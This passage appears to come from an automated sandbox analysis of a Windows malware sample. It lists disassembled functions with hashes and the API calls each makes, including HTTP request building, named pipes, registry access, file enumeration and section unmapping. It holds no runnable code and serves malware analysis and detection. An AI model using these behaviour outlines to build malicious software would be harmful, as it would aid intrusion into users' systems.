  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
